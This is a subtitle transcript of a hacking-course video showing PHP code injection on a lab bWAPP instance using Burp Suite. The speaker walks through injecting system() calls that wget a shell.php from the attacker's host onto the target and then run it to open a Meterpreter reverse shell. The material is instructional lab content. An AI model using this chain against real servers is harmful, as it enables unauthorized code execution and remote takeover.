1
00:00:00,150 --> 00:00:02,250
Hello everybody and welcome back.

2
00:00:02,250 --> 00:00:07,440
And now before we continue to the next tutorial where I will actually show you some of the exploits

3
00:00:07,440 --> 00:00:10,550
that you can run on Metasploitable,

4
00:00:10,680 --> 00:00:15,240
let me just show you real quick what PHP code injection is. Now

5
00:00:15,270 --> 00:00:21,390
it is very similar to the previous lecture where we covered the OS command injection, but right now

6
00:00:21,510 --> 00:00:23,310
let us open the same page.

7
00:00:23,310 --> 00:00:31,770
So it is located on the bWAPP on our OWASP virtual machine. Go right here and find the PHP code

8
00:00:31,770 --> 00:00:32,600
injection.

9
00:00:32,790 --> 00:00:37,950
Once you click on that, click here on hack, and here you have a simple page which basically just says

10
00:00:38,010 --> 00:00:41,280
this is just a test page reflecting back your message.

11
00:00:41,910 --> 00:00:47,730
So if you just click on the message it will say test. If you click on the message

12
00:00:47,730 --> 00:00:50,660
once again it will once again say test.

13
00:00:50,760 --> 00:00:57,700
Now you might be asking yourself, well, there isn't any input right here into which we can input our code.

14
00:00:57,750 --> 00:00:58,650
Well, that's true.

15
00:00:58,650 --> 00:01:03,800
But if we actually try to intercept this with our Burp Suite,

16
00:01:03,990 --> 00:01:10,450
so open up your Burp Suite and click here on the intercept on. We want to have the intercept on.

17
00:01:10,470 --> 00:01:16,660
And once again if you click here on the message, it will show us a packet that we sent to the web server.

18
00:01:16,670 --> 00:01:24,990
Now it looks very normal until you notice that there is actually user input right here.

19
00:01:25,020 --> 00:01:30,450
So this is not something that you have a form to input on the website, but if you intercept the packet,

20
00:01:30,450 --> 00:01:32,600
you can actually input it right here.

21
00:01:32,610 --> 00:01:39,390
So what I mean by that: right now, since this is a PHP code injection, we need to use a function, system,

22
00:01:40,020 --> 00:01:46,320
and then open up your brackets, and then let's type pwd, which is print working directory.

23
00:01:46,320 --> 00:01:48,690
So, we just type that right here.

24
00:01:48,690 --> 00:01:55,450
So system pwd, that is a function that will print our working directory. And when we forward this packet,

25
00:01:55,650 --> 00:02:02,490
you will see that we no longer get the test as a result but we get the current working directory of

26
00:02:02,490 --> 00:02:06,390
that virtual machine, or basically of our OWASP virtual machine.

27
00:02:06,720 --> 00:02:12,690
And just like that we can now know that the server is vulnerable to the PHP code injection.

28
00:02:12,690 --> 00:02:18,540
So, what we can do from there, we can actually perform the same type of attack as we performed in

29
00:02:18,540 --> 00:02:19,530
the previous video.

30
00:02:19,650 --> 00:02:25,500
So I will show you. If we click on the message once again and intercept the next packet,

31
00:02:25,560 --> 00:02:34,190
you can actually just download the shell.php the same way we downloaded it in the previous video.

32
00:02:34,200 --> 00:02:40,110
So what you would do... but in this case you would do a system first and then open up your brackets. And

33
00:02:40,110 --> 00:02:47,700
then type the same command, wget 192.168.1.15. Or, basically, here you would

34
00:02:47,700 --> 00:02:54,300
specify your own IP address if you're running, of course, Apache on your Kali Linux machine. If

35
00:02:54,300 --> 00:02:58,680
you're running Apache 2 on some other machine, you will specify the IP address of that other machine

36
00:02:58,680 --> 00:03:06,690
that is hosting the Apache 2 with your shell.php file. And you also need to add /shell.php

37
00:03:06,690 --> 00:03:12,810
so it knows which file to download from there. And the only thing you need to do from there is close the

38
00:03:12,810 --> 00:03:15,570
quotes, and then close the brackets.

39
00:03:15,690 --> 00:03:20,690
Once you do that, you just need to forward this packet and this packet.

40
00:03:20,730 --> 00:03:26,370
And this basically will, let us just turn the intercept off, and what this will do is it will basically

41
00:03:26,430 --> 00:03:32,390
download the shell.php to the target machine, as it did in the previous video.

42
00:03:32,400 --> 00:03:34,000
So right now if I just type here

43
00:03:34,020 --> 00:03:46,620
ls once again, and I go right here, and then system, open brackets, ls, close quotes, close brackets,

44
00:03:46,620 --> 00:03:50,370
and then I forward it, same as in the previous video. Right now

45
00:03:50,400 --> 00:03:54,850
if I go right here we should be able to find the shell.php file.

46
00:03:55,230 --> 00:03:56,950
So here it is right here.

47
00:03:57,150 --> 00:04:03,870
We can see that we successfully uploaded the shell.php onto our target web server. And right now

48
00:04:03,870 --> 00:04:10,800
what you would do is basically just click on the message once again. And what you would do is type here

49
00:04:10,890 --> 00:04:17,310
system, and then the next thing you would do is basically php.

50
00:04:17,880 --> 00:04:25,350
So php -f and then shell.php. You will close the quotes, close the brackets, and then you will

51
00:04:25,350 --> 00:04:27,230
forward this packet as well.

52
00:04:27,240 --> 00:04:30,300
Now what this will do, this will basically,

53
00:04:30,390 --> 00:04:31,810
so let me just close this,

54
00:04:31,830 --> 00:04:37,350
this will basically connect to our own listening machine, which is our Kali Linux machine, and it will

55
00:04:37,350 --> 00:04:40,090
prompt us with our meterpreter shell.

56
00:04:40,140 --> 00:04:45,480
Now it won't connect since I didn't really open up my Metasploit framework, and didn't specify the

57
00:04:45,480 --> 00:04:45,850
LHOST

58
00:04:45,850 --> 00:04:50,280
and LPORT, and that exploit multi handler that we did in the previous video.

59
00:04:50,430 --> 00:04:52,730
So it really won't connect anywhere at the moment.

60
00:04:52,740 --> 00:04:58,270
But I just wanted to show you the exact same process that we did in the previous video, just with the

61
00:04:58,320 --> 00:05:03,950
PHP code injection. If you want to try to exploit it you can do what I said with this. But before

62
00:05:03,950 --> 00:05:10,160
you run the program itself with the last command, which was the php -f and then the shell.php,

63
00:05:10,250 --> 00:05:14,210
you want to specify this listener in our Metasploit framework.

64
00:05:14,210 --> 00:05:18,920
Now the listener is the same as in the previous video,

65
00:05:19,340 --> 00:05:21,780
so I will not be covering that.

66
00:05:21,800 --> 00:05:27,110
Now in the next video what I will show you is how you can actually use some of the attacks and exploit

67
00:05:27,110 --> 00:05:29,790
Metasploitable. Since I can't really run Metasploitable,

68
00:05:29,790 --> 00:05:33,860
I will only show you the process to get to exploit it.

69
00:05:34,430 --> 00:05:39,530
I will not be really exploiting it since it doesn't work here.

70
00:05:39,530 --> 00:05:42,790
I hope you enjoyed this tutorial and I hope to see you in the next one.

71
00:05:42,890 --> 00:05:43,390
Bye!